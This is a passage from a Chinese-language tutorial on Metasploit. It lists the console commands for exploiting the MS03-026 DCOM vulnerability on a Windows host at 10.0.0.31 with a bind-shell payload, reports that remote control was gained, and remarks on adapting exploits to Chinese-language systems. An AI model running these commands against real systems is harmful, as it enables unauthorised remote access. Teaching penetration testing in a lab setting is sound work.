图13

◆根据了解的MS03_026_dcom的相关信息，使用漏洞利用程序。
输入：use exploit/windows/dcerpc/ms03_026_dcom
查看利用程序需要设置的相关内容
输入：show options
设置攻击目的主机的IP地址
输入：set RHOST 10.0.0.31
设置加载的ShellCode程序
输入：set PAYLOAD generic/shell_bind_tcp
执行利用程序
输入：exploit
系统攻击成功，并获取远程主机的权限，如下图所示：

图14

Metasploit会不定期更新可利用的漏洞程序，可以通过Online Update来进行升级。

由于Metasploit是国外的开源组织来维护，所以其中的exploit程序主要是针对国外语言的操作系统。对于中文操作系统的exploit程序，有些还需要进一步的修改。叶子会在以后的文章中来讨论怎样修改Metasploit的exploit程序内容。

上一页  [1] [2] [3] [4]